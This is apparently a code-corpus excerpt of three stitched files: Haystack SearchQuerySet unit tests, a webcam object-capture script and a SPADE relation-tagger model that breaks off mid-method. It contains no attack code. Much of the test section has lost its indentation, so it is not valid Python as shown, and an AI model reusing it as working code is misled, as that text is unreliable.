self.assertEqual(len(connections["default"].queries), 1)
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
results = self.msqs.all()
self.assertEqual(int(results[22].pk), MOCK_SEARCH_RESULTS[22].pk)
self.assertEqual(len(connections["default"].queries), 1)
def test_manual_iter(self):
results = self.msqs.all()
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
check = [result.pk for result in results._manual_iter()]
self.assertEqual(
check,
[
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"10",
"11",
"12",
"13",
"14",
"15",
"16",
"17",
"18",
"19",
"20",
"21",
"22",
"23",
],
)
self.assertEqual(len(connections["default"].queries), 3)
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
# Test to ensure we properly fill the cache, even if we get fewer
# results back (not a handled model) than the hit count indicates.
# This will hang indefinitely if broken.
# CharPK testing
old_ui = self.ui
self.ui.build(indexes=[self.cpkmmsi])
connections["default"]._index = self.ui
self.cpkmmsi.update()
results = self.msqs.all()
loaded = [result.pk for result in results._manual_iter()]
self.assertEqual(loaded, ["sometext", "1234"])
self.assertEqual(len(connections["default"].queries), 1)
# UUID testing
self.ui.build(indexes=[self.uuidmmsi])
connections["default"]._index = self.ui
self.uuidmmsi.update()
results = self.msqs.all()
loaded = [result.pk for result in results._manual_iter()]
self.assertEqual(
loaded,
[
"53554c58-7051-4350-bcc9-dad75eb248a9",
"77554c58-7051-4350-bcc9-dad75eb24888",
],
)
connections["default"]._index = old_ui
def test_cache_is_full(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
self.assertEqual(self.msqs._cache_is_full(), False)
results = self.msqs.all()
fire_the_iterator_and_fill_cache = list(results)
self.assertEqual(23, len(fire_the_iterator_and_fill_cache))
self.assertEqual(results._cache_is_full(), True)
self.assertEqual(len(connections["default"].queries), 4)
def test_all(self):
sqs = self.msqs.all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
def test_filter(self):
sqs = self.msqs.filter(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_exclude(self):
sqs = self.msqs.exclude(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_order_by(self):
sqs = self.msqs.order_by("foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertTrue("foo" in sqs.query.order_by)
def test_models(self):
# Stow.
old_unified_index = connections["default"]._index
ui = UnifiedIndex()
bmmsi = BasicMockModelSearchIndex()
bammsi = BasicAnotherMockModelSearchIndex()
ui.build(indexes=[bmmsi, bammsi])
connections["default"]._index = ui
msqs = SearchQuerySet()
sqs = msqs.all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 0)
sqs = msqs.models(MockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 1)
sqs = msqs.models(MockModel, AnotherMockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 2)
# This will produce a warning.
ui.build(indexes=[bmmsi])
sqs = msqs.models(AnotherMockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 1)
def test_result_class(self):
sqs = self.msqs.all()
self.assertTrue(issubclass(sqs.query.result_class, SearchResult))
# Custom class.
class IttyBittyResult:
pass
sqs = self.msqs.result_class(IttyBittyResult)
self.assertTrue(issubclass(sqs.query.result_class, IttyBittyResult))
# Reset to default.
sqs = self.msqs.result_class(None)
self.assertTrue(issubclass(sqs.query.result_class, SearchResult))
def test_boost(self):
sqs = self.msqs.boost("foo", 10)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.boost.keys()), 1)
def test_highlight(self):
sqs = self.msqs.highlight()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.query.highlight, True)
def test_spelling_override(self):
sqs = self.msqs.filter(content="not the spellchecking query")
self.assertEqual(sqs.query.spelling_query, None)
sqs = self.msqs.set_spelling_query("override")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.query.spelling_query, "override")
def test_spelling_suggestions(self):
# Test the case where spelling support is disabled.
sqs = self.msqs.filter(content="Indx")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.spelling_suggestion(), None)
self.assertEqual(sqs.spelling_suggestion("indexy"), None)
def test_raw_search(self):
self.assertEqual(len(self.msqs.raw_search("foo")), 23)
self.assertEqual(
len(
self.msqs.raw_search("(content__exact:hello AND content__exact:world)")
),
23,
)
def test_load_all(self):
# Models with character primary keys.
sqs = SearchQuerySet()
sqs.query.backend = CharPKMockSearchBackend("charpk")
results = sqs.load_all().all()
self.assertEqual(len(results._result_cache), 0)
results._fill_cache(0, 2)
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 2
)
# Models with uuid primary keys.
sqs = SearchQuerySet()
sqs.query.backend = UUIDMockSearchBackend("uuid")
results = sqs.load_all().all()
self.assertEqual(len(results._result_cache), 0)
results._fill_cache(0, 2)
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 2
)
# If nothing is handled, you get nothing.
old_ui = connections["default"]._index
ui = UnifiedIndex()
ui.build(indexes=[])
connections["default"]._index = ui
sqs = self.msqs.load_all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs), 0)
connections["default"]._index = old_ui
# For full tests, see the solr_backend.
    def test_load_all_read_queryset(self):
        """load_all() must honor each SearchIndex's read_queryset().

        With the default index, a deleted model instance is filtered out of
        the hydrated results; with an index whose read_queryset() returns
        deleted items too, both results come back.
        """
        # Stow.
        old_ui = connections["default"]._index
        ui = UnifiedIndex()
        gafmmsi = GhettoAFifthMockModelSearchIndex()
        ui.build(indexes=[gafmmsi])
        connections["default"]._index = ui
        gafmmsi.update()
        sqs = SearchQuerySet()
        results = sqs.load_all().all()
        results.query.backend = ReadQuerySetMockSearchBackend("default")
        results._fill_cache(0, 2)
        # The deleted result isn't returned
        self.assertEqual(
            len([result for result in results._result_cache if result is not None]), 1
        )
        # Register a SearchIndex with a read_queryset that returns deleted items
        rqstsi = TextReadQuerySetTestSearchIndex()
        ui.build(indexes=[rqstsi])
        rqstsi.update()
        sqs = SearchQuerySet()
        results = sqs.load_all().all()
        results.query.backend = ReadQuerySetMockSearchBackend("default")
        results._fill_cache(0, 2)
        # Both the deleted and not deleted items are returned
        self.assertEqual(
            len([result for result in results._result_cache if result is not None]), 2
        )
        # Restore.
        connections["default"]._index = old_ui
def test_auto_query(self):
sqs = self.msqs.auto_query("test search -stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
"<SQ: AND content__content=test search -stuff>",
)
sqs = self.msqs.auto_query('test "my thing" search -stuff')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND content__content=test "my thing" search -stuff>',
)
sqs = self.msqs.auto_query("test \"my thing\" search 'moar quotes' -stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
"<SQ: AND content__content=test \"my thing\" search 'moar quotes' -stuff>",
)
sqs = self.msqs.auto_query('test "my thing" search \'moar quotes\' "foo -stuff')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND content__content=test "my thing" search \'moar quotes\' "foo -stuff>',
)
sqs = self.msqs.auto_query("test - stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), "<SQ: AND content__content=test - stuff>"
)
# Ensure bits in exact matches get escaped properly as well.
sqs = self.msqs.auto_query('"pants:rule"')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), '<SQ: AND content__content="pants:rule">'
)
# Now with a different fieldname
sqs = self.msqs.auto_query("test search -stuff", fieldname="title")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), "<SQ: AND title__content=test search -stuff>"
)
sqs = self.msqs.auto_query('test "my thing" search -stuff', fieldname="title")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND title__content=test "my thing" search -stuff>',
)
def test_count(self):
self.assertEqual(self.msqs.count(), 23)
def test_facet_counts(self):
self.assertEqual(self.msqs.facet_counts(), {})
def test_best_match(self):
self.assertTrue(isinstance(self.msqs.best_match(), SearchResult))
def test_latest(self):
self.assertTrue(isinstance(self.msqs.latest("pub_date"), SearchResult))
def test_more_like_this(self):
mock = MockModel()
mock.id = 1
self.assertEqual(len(self.msqs.more_like_this(mock)), 23)
def test_facets(self):
sqs = self.msqs.facet("foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.facets), 1)
sqs2 = self.msqs.facet("foo").facet("bar")
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.facets), 2)
def test_date_facets(self):
try:
sqs = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="smarblaph",
)
self.fail()
except FacetingError as e:
self.assertEqual(
str(e),
"The gap_by ('smarblaph') must be one of the following: year, month, day, hour, minute, second.",
)
sqs = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="month",
)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.date_facets), 1)
sqs2 = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="month",
).date_facet(
"bar",
start_date=datetime.date(2007, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="year",
)
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.date_facets), 2)
def test_query_facets(self):
sqs = self.msqs.query_facet("foo", "[bar TO *]")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_facets), 1)
sqs2 = self.msqs.query_facet("foo", "[bar TO *]").query_facet(
"bar", "[100 TO 499]"
)
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.query_facets), 2)
# Test multiple query facets on a single field
sqs3 = (
self.msqs.query_facet("foo", "[bar TO *]")
.query_facet("bar", "[100 TO 499]")
.query_facet("foo", "[1000 TO 1499]")
)
self.assertTrue(isinstance(sqs3, SearchQuerySet))
self.assertEqual(len(sqs3.query.query_facets), 3)
def test_stats(self):
sqs = self.msqs.stats_facet("foo", "bar")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.stats), 1)
sqs2 = self.msqs.stats_facet("foo", "bar").stats_facet("foo", "baz")
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.stats), 1)
sqs3 = self.msqs.stats_facet("foo", "bar").stats_facet("moof", "baz")
self.assertTrue(isinstance(sqs3, SearchQuerySet))
self.assertEqual(len(sqs3.query.stats), 2)
def test_narrow(self):
sqs = self.msqs.narrow("foo:moof")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.narrow_queries), 1)
def test_clone(self):
results = self.msqs.filter(foo="bar", foo__lt="10")
clone = results._clone()
self.assertTrue(isinstance(clone, SearchQuerySet))
self.assertEqual(str(clone.query), str(results.query))
self.assertEqual(clone._result_cache, [])
self.assertEqual(clone._result_count, None)
self.assertEqual(clone._cache_full, False)
self.assertEqual(clone._using, results._using)
def test_using(self):
sqs = SearchQuerySet(using="default")
self.assertNotEqual(sqs.query, None)
self.assertEqual(sqs.query._using, "default")
def test_chaining(self):
sqs = self.msqs.filter(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
# A second instance should inherit none of the changes from above.
sqs = self.msqs.filter(content="bar")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_none(self):
sqs = self.msqs.none()
self.assertTrue(isinstance(sqs, EmptySearchQuerySet))
self.assertEqual(len(sqs), 0)
def test___and__(self):
sqs1 = self.msqs.filter(content="foo")
sqs2 = self.msqs.filter(content="bar")
sqs = sqs1 & sqs2
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 2)
def test___or__(self):
sqs1 = self.msqs.filter(content="foo")
sqs2 = self.msqs.filter(content="bar")
sqs = sqs1 | sqs2
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 2)
def test_and_or(self):
"""
Combining AND queries with OR should give
AND(OR(a, b), OR(c, d))
"""
sqs1 = self.msqs.filter(content="foo").filter(content="oof")
sqs2 = self.msqs.filter(content="bar").filter(content="rab")
sqs = sqs1 | sqs2
self.assertEqual(sqs.query.query_filter.connector, "OR")
self.assertEqual(
repr(sqs.query.query_filter.children[0]), repr(sqs1.query.query_filter)
)
self.assertEqual(
repr(sqs.query.query_filter.children[1]), repr(sqs2.query.query_filter)
)
def test_or_and(self):
"""
Combining OR queries with AND should give
OR(AND(a, b), AND(c, d))
"""
sqs1 = self.msqs.filter(content="foo").filter_or(content="oof")
sqs2 = self.msqs.filter(content="bar").filter_or(content="rab")
sqs = sqs1 & sqs2
self.assertEqual(sqs.query.query_filter.connector, "AND")
self.assertEqual(
repr(sqs.query.query_filter.children[0]), repr(sqs1.query.query_filter)
)
self.assertEqual(
repr(sqs.query.query_filter.children[1]), repr(sqs2.query.query_filter)
)
class ValuesQuerySetTestCase(SearchQuerySetTestCase):
    """Checks the dict- and tuple-returning variants of SearchQuerySet.

    The original used the long-deprecated ``self.assert_`` alias and
    asserted on ``sqs`` where ``flat_sqs`` was intended; both fixed here.
    """

    def test_values_sqs(self):
        sqs = self.msqs.auto_query("test").values("id")
        self.assertIsInstance(sqs, ValuesSearchQuerySet)
        # We'll do a basic test to confirm that slicing works as expected:
        self.assertIsInstance(sqs[0], dict)
        self.assertIsInstance(sqs[0:5][0], dict)

    def test_valueslist_sqs(self):
        sqs = self.msqs.auto_query("test").values_list("id")
        self.assertIsInstance(sqs, ValuesListSearchQuerySet)
        self.assertIsInstance(sqs[0], (list, tuple))
        self.assertIsInstance(sqs[0:1][0], (list, tuple))
        # flat=True is only valid with a single field.
        self.assertRaises(
            TypeError,
            self.msqs.auto_query("test").values_list,
            "id",
            "score",
            flat=True,
        )
        flat_sqs = self.msqs.auto_query("test").values_list("id", flat=True)
        # Bug fix: the original checked `sqs` here instead of `flat_sqs`.
        self.assertIsInstance(flat_sqs, ValuesListSearchQuerySet)
        # Note that this will actually be None because a mocked sqs lacks
        # anything else:
        self.assertIsNone(flat_sqs[0])
        self.assertIsNone(flat_sqs[0:1][0])
class EmptySearchQuerySetTestCase(TestCase):
    """EmptySearchQuerySet should behave like an always-empty result set."""

    def setUp(self):
        super().setUp()
        self.esqs = EmptySearchQuerySet()

    def test_get_count(self):
        self.assertEqual(self.esqs.count(), 0)
        self.assertEqual(len(self.esqs.all()), 0)

    def test_filter(self):
        sqs = self.esqs.filter(content="foo")
        self.assertIsInstance(sqs, EmptySearchQuerySet)
        self.assertEqual(len(sqs), 0)

    def test_exclude(self):
        sqs = self.esqs.exclude(content="foo")
        self.assertIsInstance(sqs, EmptySearchQuerySet)
        self.assertEqual(len(sqs), 0)

    def test_slice(self):
        sqs = self.esqs.filter(content="foo")
        self.assertIsInstance(sqs, EmptySearchQuerySet)
        self.assertEqual(len(sqs), 0)
        self.assertEqual(sqs[:10], [])
        # assertRaises context instead of the fragile try/self.fail() pattern.
        with self.assertRaises(IndexError):
            sqs[4]

    def test_dictionary_lookup(self):
        """
        Ensure doing a dictionary lookup raises a TypeError so
        EmptySearchQuerySets can be used in templates.
        """
        self.assertRaises(TypeError, lambda: self.esqs["count"])
@override_settings(DEBUG=True)
class PickleSearchQuerySetTestCase(TestCase):
    """Verify that a fully-cached SearchQuerySet survives a pickle round trip."""

    fixtures = ["base_data"]

    def setUp(self):
        super().setUp()
        # Stow the live unified index and replace it with one built only
        # from the mock indexes, so the test controls what gets searched.
        self.old_unified_index = connections["default"]._index
        self.ui = UnifiedIndex()
        self.bmmsi = BasicMockModelSearchIndex()
        self.cpkmmsi = CharPKMockModelSearchIndex()
        self.ui.build(indexes=[self.bmmsi, self.cpkmmsi])
        connections["default"]._index = self.ui
        # Update the "index".
        backend = connections["default"].get_backend()
        backend.clear()
        backend.update(self.bmmsi, MockModel.objects.all())
        self.msqs = SearchQuerySet()
        # Stow.
        reset_search_queries()

    def tearDown(self):
        # Restore.
        connections["default"]._index = self.old_unified_index
        super().tearDown()

    def test_pickling(self):
        results = self.msqs.all()
        for res in results:
            # Make sure the cache is full.
            pass
        in_a_pickle = pickle.dumps(results)
        like_a_cuke = pickle.loads(in_a_pickle)
        # The unpickled queryset must expose the same results.
        self.assertEqual(len(like_a_cuke), len(results))
        self.assertEqual(like_a_cuke[0].id, results[0].id)
| 35.113994 | 171 | 0.613096 |
243b665234a2cae2535cf295fd5d8825846f47f5 | 888 | py | Python | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | #Fuente https://www.youtube.com/watch?v=v_cwOq06g9E&list=RDCMUCCDvMED1sysAbF5qOfmEw3A&index=3
import cv2
import numpy as np
import imutils
import os
Datos = 'deteccion de objetos\p'
if not os.path.exists(Datos):
print('Carpeta creada: ', Datos)
os.makedirs(Datos)
cap = cv2.VideoCapture(0,cv2.CAP_DSHOW)
x1, y1 = 190, 80
x2, y2 = 450, 398
count = 0
while True:
ret, frame = cap.read()
if ret == False: break
imAux = frame.copy()
cv2.rectangle(frame,(x1,y1),(x2,y2),(255,0,0),2)
objeto = imAux[y1:y2,x1:x2]
objeto = imutils.resize(objeto, width=38)
# print(objeto.shape)
k = cv2.waitKey(1)
if k == ord('s'):
cv2.imwrite(Datos+'/objeto_{}.jpg'.format(count),objeto)
print('Imagen almacenada: ', 'objeto_{}.jpg'.format(count))
count = count + 1
if k == 27:
break
cv2.imshow('frame',frame)
cv2.imshow('objeto',objeto)
cap.release()
cv2.destroyAllWindows() | 19.733333 | 93 | 0.685811 |
67bba1d865301d3711bdbb3fa4a9dc53c0db0bc9 | 26,929 | py | Python | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | # SPADE
# Copyright (c) 2021-present NAVER Corp.
# Apache License v2.0
import os
import time
from copy import deepcopy
from itertools import zip_longest
from pathlib import Path
from pprint import pprint
from typing import Any, List
import pytorch_lightning as pl
import torch
from pytorch_lightning.utilities import rank_zero_only
import spade.model.model_utils as mu
import spade.utils.analysis_utils as au
import spade.utils.general_utils as gu
from spade.model.metric import SpadeMetric
from spade.model.model_loss import Loss_rt
from spade.model.model_optimizer import get_lr_dict, get_optimizer
from spade.model.model_spade_encoder import SpadeEncoder
from spade.model.model_spade_graph_decoder import gen_parses, pred_label
from spade.model.model_spade_graph_generator import SpadeDecoder
from spade.model.model_utils import RelationTaggerUtils as rtu
class RelationTagger(pl.LightningModule):
# No pool layer
    def __init__(self, hparam, tparam, iparam, path_data_folder, verbose=False):
        """Build the SPADE relation tagger.

        Args:
            hparam: model hyperparameters (task, fields, encoder/decoder config).
            tparam: training parameters (loss weights, optimizer settings).
            iparam: inference parameters (parse refinement options).
            path_data_folder: root folder used to load the pretrained backbone.
            verbose: if True, print parsing results during validation.
        """
        super().__init__()
        self.hparam = hparam
        self.tparam = tparam
        self.iparam = iparam
        self.verbose = verbose
        self.task = hparam.task
        self.task_lan = hparam.task_lan
        self.fields = hparam.fields
        self.field_rs = hparam.field_representers
        self.n_fields = len(hparam.fields)
        self.name = hparam.model_name
        self.max_input_len = hparam.max_input_len
        self.input_split_overlap_len = hparam.input_split_overlap_len
        self.encoder_layer_ids_used_in_decoder = (
            hparam.encoder_layer_ids_used_in_decoder
        )
        self.cross_entropy_loss_weight = torch.tensor(tparam.cross_entropy_loss_weight)
        # Best validation metric seen so far; the higher, the better.
        self.validation_top_score = None  # the higher, the better
        self.encoder_layer = gen_encoder_layer(hparam, path_data_folder)  # encoder
        self.decoder_layer = gen_decoder_layer(
            hparam, self.encoder_layer.transformer_cfg
        )
        self.spade_metric = SpadeMetric(hparam.n_relation_type, dist_sync_on_step=False)
        # Options forwarded to the parse-refinement step at inference time.
        self.parse_refine_options = {
            "refine_parse": self.iparam.refine_parse,
            "allow_small_edit_distance": self.iparam.allow_small_edit_distance,
            "task_lan": self.task_lan,
            "unwanted_fields": self.iparam.unwanted_fields,
        }
        self.char_for_detokenization = gu.get_char_for_detokenization(
            hparam.encoder_backbone_name
        )
    def forward(
        self,
        text_tok_ids,
        rn_center_x_toks,
        rn_center_y_toks,
        rn_dist_toks,
        rn_angle_toks,
        vertical_toks,
        char_size_toks,
        header_toks,
        n_seps,
        i_toks,
        j_toks,
        l_toks,
        lmax_toks,  # for multi-gpu
        lmax_boxes,
    ):
        """Encode the (possibly split) token features, then score relations.

        Returns the decoder's relation score tensor for the batch.
        """
        # splits
        # header_toks is consumed (mutated) by the encoder split path, so keep
        # an untouched copy for the decoder.
        header_ori_toks = deepcopy(header_toks)
        encoded = self.encoder_forward(
            text_tok_ids,
            rn_center_x_toks,
            rn_center_y_toks,
            rn_dist_toks,
            rn_angle_toks,
            vertical_toks,
            char_size_toks,
            header_toks,
            n_seps,
            i_toks,
            j_toks,
            l_toks,
            lmax_toks,
        )
        # decoding
        score = self.decoder_layer(encoded, header_ori_toks, lmax_boxes)
        return score
    def encoder_forward(
        self,
        text_tok_ids,
        rn_center_x_toks,
        rn_center_y_toks,
        rn_dist_toks,
        rn_angle_toks,
        vertical_toks,
        char_size_toks,
        header_toks,
        n_seps,
        i_toks,
        j_toks,
        l_toks,
        lmax_toks,
    ):
        """Run the transformer encoder over inputs longer than the window.

        Sequences longer than ``max_input_len`` are split into overlapping
        windows, each window is encoded separately, and the per-window
        outputs are stitched back into one tensor per example.
        """
        # 1. split features that have len > 512
        (
            text_tok_ids,
            rn_center_x_toks,
            rn_center_y_toks,
            rn_dist_toks,
            rn_angle_toks,
            vertical_toks,
            char_size_toks,
            header_toks,
        ) = rtu.split_features(
            n_seps,
            i_toks,
            j_toks,
            self.max_input_len,
            text_tok_ids,
            rn_center_x_toks,
            rn_center_y_toks,
            rn_dist_toks,
            rn_angle_toks,
            vertical_toks,
            char_size_toks,
            header_toks,
        )  # [n_sep, batch_size]
        # 2. encode each splitted feature
        encoded = []
        nmax_seps = max(n_seps)
        for i_sep in range(nmax_seps):
            attention_mask, l_mask = rtu.gen_input_mask(
                i_sep, l_toks, i_toks, j_toks, self.max_input_len
            )
            try:
                all_encoder_layer = self.encoder_layer(
                    text_tok_ids[i_sep],
                    rn_center_x_toks[i_sep],
                    rn_center_y_toks[i_sep],
                    rn_dist_toks[i_sep],
                    rn_angle_toks[i_sep],
                    vertical_toks[i_sep],
                    char_size_toks[i_sep],
                    header_toks[i_sep],
                    attention_mask=attention_mask,
                )
            except RuntimeError:
                # Best-effort OOM recovery: after the first window, substitute
                # zero vectors for the failed window instead of aborting.
                print(f"i_sep = {i_sep + 1} / n_sep = {nmax_seps}")
                print("Fail to encode due to the memory limit.")
                print("The encoder output vectors set to zero.")
                if i_sep == 0:
                    print(f"Even single encoding faield!")
                    raise MemoryError
                else:
                    l_layer = self.encoder_layer.transformer_cfg.num_hidden_layers
                    all_encoder_layer = [
                        torch.zeros_like(all_encoder_layer[0]) for _ in range(l_layer)
                    ]
            encoded1_part = rtu.get_encoded1_part(
                all_encoder_layer,
                self.max_input_len,
                self.input_split_overlap_len,
                n_seps,
                i_sep,
                i_toks,
                j_toks,
                l_toks,
                self.encoder_layer_ids_used_in_decoder,
            )
            encoded.append(encoded1_part)
        # 3. Combine splited encoder outputs
        encoded = rtu.tensorize_encoded(encoded, l_toks, lmax_toks)
        return encoded
    # @gu.timeit
    def _run(self, mode, batch):
        """Shared forward pass used by training/validation/test steps.

        Collects batch features, scores relations, predicts labels, and
        generates both ground-truth (when labels exist) and predicted parses.

        Args:
            mode: "train" or "test" — controls the max serialization length
                used when generating predicted parses early in training.
            batch: list of per-example feature bundles.

        Returns:
            dict with scores, (predicted) labels, parses and bookkeeping ids.
        """
        # 1. Batchwise collection of features
        (
            data_ids,
            image_urls,
            texts,
            text_toks,
            text_tok_ids,
            labels,
            label_toks,
            rn_center_toks,
            rn_dist_toks,
            rn_angle_toks,
            vertical_toks,
            char_size_toks,
            header_toks,
        ) = mu.collect_features_batchwise(batch)
        # 2. Calculate length for the padding.
        l_boxes = [len(x) for x in texts]
        l_tokens = [len(x) for x in text_toks]
        if self.hparam.token_lv_boxing:
            # Individual units are tokens.
            l_units = l_tokens
            label_units = label_toks
            text_units = text_toks
        else:
            # Individual units are text segments from OCR-detection-boxes.
            l_units = l_boxes
            label_units = labels
            text_units = texts
            # hot-fix
            # label_toks include junks when label is None.
            if labels[0] is None:
                label_units = labels
        lmax_boxes = max(l_boxes)
        # 3. Split data whose token length > 512
        n_seps, i_toks, j_toks, l_toks = rtu.get_split_param(
            text_toks,
            self.hparam.max_input_len,
            self.hparam.input_split_overlap_len,
            type_informer_tensor=text_tok_ids[0],
        )
        # 4. get score
        batch_data_in = (
            text_tok_ids,
            rn_center_toks,
            rn_dist_toks,
            rn_angle_toks,
            vertical_toks,
            char_size_toks,
            header_toks,
            n_seps,
            i_toks,
            j_toks,
            l_toks,
        )
        score = rtu.get_score(self, batch_data_in, lmax_boxes)
        # 5. prediction
        pr_label_units = pred_label(
            self.task,
            score,
            self.hparam.inferring_method,
            self.n_fields,
            l_units,
        )
        if labels[0] is not None:
            # 6. Generate gt parse
            parses, f_parses, text_unit_field_labels, f_parse_box_ids = gen_parses(
                self.task,
                self.fields,
                self.field_rs,
                text_units,
                label_units,
                header_toks,
                l_max_gen=self.hparam.l_max_gen_of_each_parse,
                max_info_depth=self.hparam.max_info_depth,
                strict=True,
                token_lv_boxing=self.hparam.token_lv_boxing,
                backbone_name=self.hparam.encoder_backbone_name,
            )
        else:
            # No ground truth (e.g. parsing raw OCR output).
            parses = [None] * len(texts)
            f_parses = [None] * len(texts)
            text_unit_field_labels = [None] * len(texts)
            f_parse_box_ids = [None] * len(texts)
        # for the speed, set max serialization length small at initial stage.
        if mode == "train" and self.current_epoch <= 100:
            pr_l_max_gen = 2
        else:
            pr_l_max_gen = self.hparam.l_max_gen_of_each_parse
        # 7. Generate predicted parses
        (
            pr_parses,
            pr_f_parses,
            pr_text_unit_field_labels,
            pr_f_parse_box_ids,
        ) = gen_parses(
            self.task,
            self.fields,
            self.field_rs,
            text_units,
            pr_label_units,
            header_toks,
            l_max_gen=pr_l_max_gen,
            max_info_depth=self.hparam.max_info_depth,
            strict=False,
            token_lv_boxing=self.hparam.token_lv_boxing,
            backbone_name=self.hparam.encoder_backbone_name,
        )
        results = {
            "data_ids": data_ids,
            "score": score,
            "text_units": text_units,
            "label_units": label_units,
            "pr_label_units": pr_label_units,
            "l_units": l_units,
            "parses": parses,
            "pr_parses": pr_parses,
            "text_unit_field_labels": text_unit_field_labels,
            "pr_text_unit_field_labels": pr_text_unit_field_labels,
            "f_parse_box_ids": f_parse_box_ids,
            "pr_f_parse_box_ids": pr_f_parse_box_ids,
        }
        return results
    def training_step(self, batch, batch_idx):
        """Lightning training step: forward pass + relation-tagging loss."""
        results = self._run("train", batch)
        loss = Loss_rt(
            results["score"],
            results["label_units"],
            self.n_fields,
            results["l_units"],
            self.cross_entropy_loss_weight,
        )
        self.log("training_loss", loss, sync_dist=True)
        out = {"loss": loss}
        # Only rank 0 keeps the extra debugging payload (printed at epoch end).
        if gu.get_local_rank() == 0:
            training_out = {
                "training_loss": loss,
                "data_ids": results["data_ids"],
                "parses": results["parses"],
                "pr_parses": results["pr_parses"],
                "label_units": results["label_units"],
                "pr_label_units": results["pr_label_units"],
            }
            out.update({"training_out": training_out})
        return out
    def training_epoch_end(self, outputs) -> None:
        """Print the epoch's average loss and one sample gt/predicted parse (rank 0 only)."""
        if gu.get_local_rank() == 0:
            losses = [x["loss"] for x in outputs]
            avg_loss = torch.mean(torch.stack(losses))
            print(f"Training, ave_loss = {avg_loss}")
            print(f"Training, gt_parse e.g. {outputs[0]['training_out']['parses'][0]}")
            print(
                f"Training, pr_parse e.g. {outputs[0]['training_out']['pr_parses'][0]}"
            )
            print(
                f"Epoch {self.current_epoch}, average training loss: {avg_loss.item()}"
            )
    def validation_step(self, batch, batch_idx):
        """Lightning validation step: compute loss and update edge/parse metrics."""
        results = self._run("test", batch)
        loss = Loss_rt(
            results["score"],
            results["label_units"],
            self.n_fields,
            results["l_units"],
            self.cross_entropy_loss_weight,
        )
        self.log("validation_loss", loss, sync_dist=True)
        val_out = {
            "data_ids": results["data_ids"],
            "loss": loss,
